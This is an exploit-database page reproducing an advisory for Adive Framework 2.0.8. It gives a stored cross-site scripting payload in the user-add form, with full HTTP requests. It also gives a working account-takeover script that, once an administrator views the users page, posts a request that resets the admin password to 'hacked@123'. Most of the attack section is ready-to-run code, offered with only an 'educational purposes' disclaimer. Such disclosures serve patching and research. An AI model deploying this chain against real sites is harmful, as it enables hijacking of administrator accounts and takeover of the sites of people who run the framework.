Adive framework 2.0.8 persistent crosssite scripting Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-01-20 | Type : webapps | Platform : php
This exploit / vulnerability Adive framework 2.0.8 persistent crosssite scripting is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Adive Framework 2.0.8 - Persistent Cross-Site Scripting
# Exploit Author: Sarthak Saini
# Dork: N/A
# Date: 2020-01-18
# Vendor Link : https://www.adive.es/
# Software Link: https://github.com/ferdinandmartin/adive-php7
# Version: 2.0.8
# Category: Webapps
# Tested on: windows64bit / mozila firefox

1) Persistent Cross-site Scripting at user add page

Description : The parameter 'userUsername=' is vulnerable to Stored Cross-site scripting

Payload:- <script>alert(1)</script>

POST /admin/user/add HTTP/1.1
Host: 192.168.2.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://192.168.2.5
DNT: 1
Connection: close
Referer: http://192.168.2.5/admin/user/add
Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4
Upgrade-Insecure-Requests: 1

userName=test&userUsername=<script>alert('xss')</script>&pass=test&cpass=test&permission=3


|----------------------------------------------------------------------------------


2) account takeover - cross side request forgery


Description : attacker can craft a malicious javascript and attach it to the stored xss, when admin visits the /admin/user page the payload will trigger.

-> Save the payload as exp.js

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-
function execute()
{
var nuri ="http://192.168.2.5/admin/config";
xhttp = new XMLHttpRequest();
xhttp.open("POST", nuri, true);
xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhttp.withCredentials = "true";
var body = "";
body += "\r\n\r\n";
body +=
"userName=Administrator&confPermissions=1&pass=hacked@123&cpass=hacked@123&invokeType=web";
xhttp.send(body);
return true;
}

execute();
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-

-> Start a server and host the exp.js. Send the exp.js file in the xss payload

Payload:- <script src="http://192.168.2.5/exp.js"></script>

POST /admin/user/add HTTP/1.1
Host: 192.168.2.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Origin: http://192.168.2.5
DNT: 1
Connection: close
Referer: http://192.168.2.5/admin/user/add
Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4
Upgrade-Insecure-Requests: 1

userName=%3Cscript+src%3D%22http%3A%2F%2F192.168.2.5%2Fexp.js%22%3E%3C%2Fscript%3E&userUsername=test&pass=test&cpass=test&permission=3


-> As soon as admin will visit the page the payload will be triggered and the admin password will be changed to hacked@123

|-----------------------------------------EOF-----------------------------------------

Adive framework 2.0.8 persistent crosssite scripting


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Adive framework 2.0.8 persistent crosssite scripting Vulnerability / Exploit